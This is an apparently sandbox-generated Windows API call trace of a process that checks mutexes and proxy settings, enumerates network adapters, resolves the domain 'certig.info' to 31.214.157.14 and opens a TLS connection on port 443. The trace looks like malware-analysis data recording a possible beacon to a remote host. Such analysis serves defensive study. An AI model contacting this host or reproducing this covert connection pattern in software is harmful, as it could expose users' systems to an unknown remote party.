	[0188.583] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c5b23c, cbSid=0x5fce9ac | out: pSid=0x2c5b23c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9ac) returned 1
	[0188.583] GetLastError () returned 0x5
	[0188.584] CreateMutexW (lpMutexAttributes=0x2c5b34c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.584] GetLastError () returned 0x5
	[0188.584] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.584] GetLastError () returned 0x5
	[0188.584] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.586] GetLastError () returned 0x5
	[0188.586] ReleaseMutex (hMutex=0x428) returned 1
	[0188.586] GetLastError () returned 0x5
	[0188.586] CloseHandle (hObject=0x428) returned 1
	[0188.586] GetLastError () returned 0x5
	[0188.586] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c5bacc, cbSid=0x5fce9ac | out: pSid=0x2c5bacc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5fce9ac) returned 1
	[0188.586] GetLastError () returned 0x5
	[0188.587] CreateMutexW (lpMutexAttributes=0x2c5bbdc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.587] GetLastError () returned 0x5
	[0188.587] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x428
	[0188.587] GetLastError () returned 0x5
	[0188.587] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1f4) returned 0x0
	[0188.589] GetLastError () returned 0x5
	[0188.590] ReleaseMutex (hMutex=0x428) returned 1
	[0188.590] GetLastError () returned 0x5
	[0188.590] CloseHandle (hObject=0x428) returned 1
	[0188.590] GetLastError () returned 0x5
	[0188.597] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x428
	[0188.598] GetLastError () returned 0x0
	[0188.598] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x434
	[0188.598] GetLastError () returned 0x0
	[0188.600] ioctlsocket (in: s=0x428, cmd=-2147195266, argp=0x5fcebf8 | out: argp=0x5fcebf8) returned 0
	[0188.600] GetLastError () returned 0x0
	[0188.607] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438
	[0188.607] GetLastError () returned 0x0
	[0188.607] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x43c
	[0188.607] GetLastError () returned 0x0
	[0188.607] ioctlsocket (in: s=0x438, cmd=-2147195266, argp=0x5fcebf8 | out: argp=0x5fcebf8) returned 0
	[0188.607] GetLastError () returned 0x0
	[0188.609] WSAIoctl (in: s=0x428, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fcebdc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fcebdc, lpOverlapped=0x0) returned -1
	[0188.609] GetLastError () returned 0x2733
	[0188.610] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x786f38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0188.619] GetLastError () returned 0x2733
	[0188.620] WSAEventSelect (s=0x428, hEventObject=0x434, lNetworkEvents=512) returned 0
	[0188.621] GetLastError () returned 0x0
	[0188.621] WSAIoctl (in: s=0x438, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fcebdc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fcebdc, lpOverlapped=0x0) returned -1
	[0188.621] GetLastError () returned 0x2733
	[0188.621] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x786f38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0188.621] GetLastError () returned 0x2733
	[0188.625] WSAEventSelect (s=0x438, hEventObject=0x43c, lNetworkEvents=512) returned 0
	[0188.625] GetLastError () returned 0x0
	[0188.625] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x440
	[0188.625] GetLastError () returned 0x0
	[0188.627] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x440, param_3=0x3) returned 0x0
	[0188.661] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x5fcebc0 | out: phkResult=0x5fcebc0*=0x458) returned 0x0
	[0188.661] GetLastError () returned 0x0
	[0188.799] RegOpenKeyExW (in: hKey=0x458, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fceb7c | out: phkResult=0x5fceb7c*=0x46c) returned 0x0
	[0188.800] GetLastError () returned 0x0
	[0188.800] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x470
	[0188.800] GetLastError () returned 0x0
	[0188.802] RegNotifyChangeKeyValue (hKey=0x46c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x470, fAsynchronous=1) returned 0x0
	[0188.802] GetLastError () returned 0x0
	[0188.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fceb7c | out: phkResult=0x5fceb7c*=0x474) returned 0x0
	[0188.804] GetLastError () returned 0x0
	[0188.804] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x478
	[0188.804] GetLastError () returned 0x0
	[0188.804] RegNotifyChangeKeyValue (hKey=0x474, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x478, fAsynchronous=1) returned 0x0
	[0188.805] GetLastError () returned 0x0
	[0188.805] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fceb7c | out: phkResult=0x5fceb7c*=0x47c) returned 0x0
	[0188.805] GetLastError () returned 0x0
	[0188.805] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x480
	[0188.805] GetLastError () returned 0x0
	[0188.805] RegNotifyChangeKeyValue (hKey=0x47c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x480, fAsynchronous=1) returned 0x0
	[0188.805] GetLastError () returned 0x0
	[0188.805] GetCurrentProcess () returned 0xffffffff
	[0188.805] GetLastError () returned 0x3f0
	[0188.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceb64 | out: TokenHandle=0x5fceb64*=0x484) returned 1
	[0188.806] GetLastError () returned 0x3f0
	[0188.813] GetCurrentProcess () returned 0xffffffff
	[0188.813] GetLastError () returned 0x3f0
	[0188.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce780 | out: TokenHandle=0x5fce780*=0x488) returned 1
	[0188.813] GetLastError () returned 0x3f0
	[0188.817] GetCurrentProcess () returned 0xffffffff
	[0188.817] GetLastError () returned 0x3f0
	[0188.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce790 | out: TokenHandle=0x5fce790*=0x48c) returned 1
	[0188.818] GetLastError () returned 0x3f0
	[0188.903] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x783790 | out: pProxyConfig=0x783790) returned 1
	[0189.892] GetLastError () returned 0x0
	[0189.901] SetEvent (hEvent=0x39c) returned 1
	[0189.901] GetLastError () returned 0x0
	[0190.014] GetCurrentProcess () returned 0xffffffff
	[0190.014] GetLastError () returned 0x3f0
	[0190.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce7b8 | out: TokenHandle=0x5fce7b8*=0x4cc) returned 1
	[0190.014] GetLastError () returned 0x3f0
	[0190.016] GetCurrentProcess () returned 0xffffffff
	[0190.016] GetLastError () returned 0x3f0
	[0190.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce7c8 | out: TokenHandle=0x5fce7c8*=0x4d0) returned 1
	[0190.016] GetLastError () returned 0x3f0
	[0190.017] SetEvent (hEvent=0x39c) returned 1
	[0190.017] GetLastError () returned 0x3f0
	[0190.061] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x5fceb18 | out: pFixedInfo=0x0, pOutBufLen=0x5fceb18) returned 0x6f
	[0190.391] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x796518
	[0190.391] GetLastError () returned 0x0
	[0190.391] GetNetworkParams (in: pFixedInfo=0x796518, pOutBufLen=0x5fceb18 | out: pFixedInfo=0x796518, pOutBufLen=0x5fceb18) returned 0x0
	[0190.472] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0190.472] GetLastError () returned 0x0
	[0190.489] LocalFree (hMem=0x796518) returned 0x0
	[0190.489] GetLastError () returned 0x0
	[0190.491] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0190.491] GetLastError () returned 0x0
	[0190.492] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0
	[0190.492] GetLastError () returned 0x0
	[0190.618] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5fce9f4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5fce788 | out: ppResult=0x5fce788*=0x794888*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x79a840*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0191.161] GetLastError () returned 0x0
	[0191.163] FreeAddrInfoW (pAddrInfo=0x794888*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰ؗ䷓グ2蠀ᾐvꞘy㙸k\x01", ai_addr=0x79a840*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0191.163] GetLastError () returned 0x0
	[0191.164] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4
	[0191.164] GetLastError () returned 0x0
	[0191.164] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ec
	[0191.164] GetLastError () returned 0x0
	[0191.164] ioctlsocket (in: s=0x4f4, cmd=-2147195266, argp=0x5fce9d8 | out: argp=0x5fce9d8) returned 0
	[0191.164] GetLastError () returned 0x0
	[0191.164] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4fc
	[0191.165] GetLastError () returned 0x0
	[0191.165] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x500
	[0191.165] GetLastError () returned 0x0
	[0191.165] ioctlsocket (in: s=0x4fc, cmd=-2147195266, argp=0x5fce9d8 | out: argp=0x5fce9d8) returned 0
	[0191.165] GetLastError () returned 0x0
	[0191.165] WSAIoctl (in: s=0x4f4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fce9bc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fce9bc, lpOverlapped=0x0) returned -1
	[0191.165] GetLastError () returned 0x2733
	[0191.165] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x786f38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0191.166] GetLastError () returned 0x2733
	[0191.166] WSAEventSelect (s=0x4f4, hEventObject=0x4ec, lNetworkEvents=512) returned 0
	[0191.166] GetLastError () returned 0x0
	[0191.166] WSAIoctl (in: s=0x4fc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fce9bc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fce9bc, lpOverlapped=0x0) returned -1
	[0191.166] GetLastError () returned 0x2733
	[0191.166] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x786f38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0191.166] GetLastError () returned 0x2733
	[0191.166] WSAEventSelect (s=0x4fc, hEventObject=0x500, lNetworkEvents=512) returned 0
	[0191.166] GetLastError () returned 0x0
	[0191.167] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x5fce9b8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x5fce9b8*=0xa5c) returned 0x6f
	[0191.191] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0x7ae808
	[0191.191] GetLastError () returned 0x0
	[0191.191] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x7ae808, SizePointer=0x5fce9b8*=0xa5c | out: AdapterAddresses=0x7ae808*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x7aeacc, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x7aea40, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x7ae980*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x5fce9b8*=0xa5c) returned 0x0
	[0191.221] LocalFree (hMem=0x7ae808) returned 0x0
	[0191.221] GetLastError () returned 0x0
	[0191.273] WSAConnect (in: s=0x4e4, name=0x2c633f0*(sa_family=2, sin_port=0x1bb, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0191.304] GetLastError () returned 0x0
	[0191.305] closesocket (s=0x4e0) returned 0
	[0191.305] GetLastError () returned 0x0
	[0191.415] EnumerateSecurityPackagesW (in: pcPackages=0x5fce960, ppPackageInfo=0x5fce8d0 | out: pcPackages=0x5fce960, ppPackageInfo=0x5fce8d0) returned 0x0
	[0191.415] GetLastError () returned 0x0
	[0191.419] lstrlenW (lpString="Negotiate") returned 9
	[0191.420] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad478, Length=0x14 | out: Destination=0x783790) 
	[0191.420] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0191.420] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad48c, Length=0x3a | out: Destination=0x783790) 
	[0191.420] lstrlenW (lpString="NegoExtender") returned 12
	[0191.420] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad4c6, Length=0x1a | out: Destination=0x783790) 
	[0191.421] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0191.421] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad4e0, Length=0x3c | out: Destination=0x783790) 
	[0191.421] lstrlenW (lpString="Kerberos") returned 8
	[0191.421] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad51c, Length=0x12 | out: Destination=0x783790) 
	[0191.421] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0191.421] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad52e, Length=0x30 | out: Destination=0x783790) 
	[0191.422] lstrlenW (lpString="NTLM") returned 4
	[0191.422] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad55e, Length=0xa | out: Destination=0x783790) 
	[0191.422] lstrlenW (lpString="NTLM Security Package") returned 21
	[0191.422] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad568, Length=0x2c | out: Destination=0x783790) 
	[0191.422] lstrlenW (lpString="Schannel") returned 8
	[0191.423] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad594, Length=0x12 | out: Destination=0x783790) 
	[0191.423] lstrlenW (lpString="Schannel Security Package") returned 25
	[0191.423] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad5a6, Length=0x34 | out: Destination=0x783790) 
	[0191.423] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0191.423] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad5da, Length=0x5a | out: Destination=0x783790) 
	[0191.423] lstrlenW (lpString="Schannel Security Package") returned 25
	[0191.423] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad634, Length=0x34 | out: Destination=0x783790) 
	[0191.424] lstrlenW (lpString="WDigest") returned 7
	[0191.424] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad668, Length=0x10 | out: Destination=0x783790) 
	[0191.424] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0191.424] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad678, Length=0x44 | out: Destination=0x783790) 
	[0191.424] lstrlenW (lpString="TSSSP") returned 5
	[0191.424] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad6bc, Length=0xc | out: Destination=0x783790) 
	[0191.424] lstrlenW (lpString="TS Service Security Package") returned 27
	[0191.424] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad6c8, Length=0x38 | out: Destination=0x783790) 
	[0191.425] lstrlenW (lpString="pku2u") returned 5
	[0191.425] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad700, Length=0xc | out: Destination=0x783790) 
	[0191.425] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0191.425] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad70c, Length=0x2e | out: Destination=0x783790) 
	[0191.425] lstrlenW (lpString="CREDSSP") returned 7
	[0191.425] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad73a, Length=0x10 | out: Destination=0x783790) 
	[0191.425] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0191.426] RtlMoveMemory (in: Destination=0x783790, Source=0x7ad74a, Length=0x48 | out: Destination=0x783790) 
	[0191.480] FreeContextBuffer (in: pvContextBuffer=0x7ad3b0 | out: pvContextBuffer=0x7ad3b0) returned 0x0
	[0191.480] GetLastError () returned 0x7f
	[0191.488] GetCurrentProcess () returned 0xffffffff
	[0191.488] GetLastError () returned 0x3f0
	[0191.488] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce728 | out: TokenHandle=0x5fce728*=0x4e0) returned 1
	[0191.488] GetLastError () returned 0x3f0
	[0191.499] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2c66254, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x5fce7c4, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x2c67abc, ptsExpiry=0x5fce730 | out: phCredential=0x2c67abc, ptsExpiry=0x5fce730) returned 0x0
	[0191.876] GetLastError () returned 0x0
	[0191.883] InitializeSecurityContextW (in: phCredential=0x5fce72c, phContext=0x0, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c67c84, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce724 | out: phNewContext=0x2c67cec, pOutput=0x2c67c84, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce724) returned 0x90312
	[0191.886] GetLastError () returned 0x0
	[0191.886] FreeContextBuffer (in: pvContextBuffer=0x745860 | out: pvContextBuffer=0x745860) returned 0x0
	[0191.886] GetLastError () returned 0x0
	[0191.926] send (s=0x4e4, buf=0x2c67d00*, len=115, flags=0) returned 115
	[0191.927] GetLastError () returned 0x0
	[0191.928] recv (in: s=0x4e4, buf=0x2c67d00, len=5, flags=0 | out: buf=0x2c67d00*) returned 5
	[0191.957] GetLastError () returned 0x0
	[0191.957] recv (in: s=0x4e4, buf=0x2c67d05, len=93, flags=0 | out: buf=0x2c67d05*) returned 93
	[0191.957] GetLastError () returned 0x0
	[0191.960] InitializeSecurityContextW (in: phCredential=0x5fce66c, phContext=0x5fce780, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2c67f48, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c67f5c, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce664 | out: phNewContext=0x2c67cec, pOutput=0x2c67f5c, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce664) returned 0x90312
	[0191.967] GetLastError () returned 0x0
	[0191.967] recv (in: s=0x4e4, buf=0x2c67fec, len=5, flags=0 | out: buf=0x2c67fec*) returned 5
	[0191.967] GetLastError () returned 0x0
	[0191.967] recv (in: s=0x4e4, buf=0x2c68005, len=2549, flags=0 | out: buf=0x2c68005*) returned 2549
	[0191.967] GetLastError () returned 0x0
	[0191.967] InitializeSecurityContextW (in: phCredential=0x5fce5b4, phContext=0x5fce6c8, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2c68a70, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c68a84, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce5ac | out: phNewContext=0x2c67cec, pOutput=0x2c68a84, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce5ac) returned 0x90312
	[0191.969] GetLastError () returned 0x0
	[0191.970] recv (in: s=0x4e4, buf=0x2c68b14, len=5, flags=0 | out: buf=0x2c68b14*) returned 5
	[0191.970] GetLastError () returned 0x0
	[0191.970] recv (in: s=0x4e4, buf=0x2c68b2d, len=331, flags=0 | out: buf=0x2c68b2d*) returned 331
	[0191.970] GetLastError () returned 0x0
	[0191.970] InitializeSecurityContextW (in: phCredential=0x5fce4fc, phContext=0x5fce610, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2c68cec, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c68d00, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce4f4 | out: phNewContext=0x2c67cec, pOutput=0x2c68d00, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce4f4) returned 0x90312
	[0191.972] GetLastError () returned 0x0
	[0191.972] recv (in: s=0x4e4, buf=0x2c68d90, len=5, flags=0 | out: buf=0x2c68d90*) returned 5
	[0191.972] GetLastError () returned 0x0
	[0191.972] recv (in: s=0x4e4, buf=0x2c68da9, len=4, flags=0 | out: buf=0x2c68da9*) returned 4
	[0191.972] GetLastError () returned 0x0
	[0191.972] InitializeSecurityContextW (in: phCredential=0x5fce444, phContext=0x5fce558, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2c68e24, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c68e38, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce43c | out: phNewContext=0x2c67cec, pOutput=0x2c68e38, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce43c) returned 0x90312
	[0191.985] GetLastError () returned 0x0
	[0191.985] FreeContextBuffer (in: pvContextBuffer=0x72c768 | out: pvContextBuffer=0x72c768) returned 0x0
	[0191.985] GetLastError () returned 0x0
	[0191.985] send (s=0x4e4, buf=0x2c68eb4*, len=134, flags=0) returned 134
	[0191.986] GetLastError () returned 0x0
	[0191.986] recv (in: s=0x4e4, buf=0x2c68eb4, len=5, flags=0 | out: buf=0x2c68eb4*) returned 5
	[0192.015] GetLastError () returned 0x0
	[0192.015] recv (in: s=0x4e4, buf=0x2c68eb9, len=1, flags=0 | out: buf=0x2c68eb9*) returned 1
	[0192.015] GetLastError () returned 0x0
	[0192.015] InitializeSecurityContextW (in: phCredential=0x5fce38c, phContext=0x5fce4a0, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2c68fc4, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c68fd8, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce384 | out: phNewContext=0x2c67cec, pOutput=0x2c68fd8, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce384) returned 0x90312
	[0192.015] GetLastError () returned 0x0
	[0192.015] recv (in: s=0x4e4, buf=0x2c69068, len=5, flags=0 | out: buf=0x2c69068*) returned 5
	[0192.015] GetLastError () returned 0x0
	[0192.016] recv (in: s=0x4e4, buf=0x2c69081, len=48, flags=0 | out: buf=0x2c69081*) returned 48
	[0192.016] GetLastError () returned 0x0
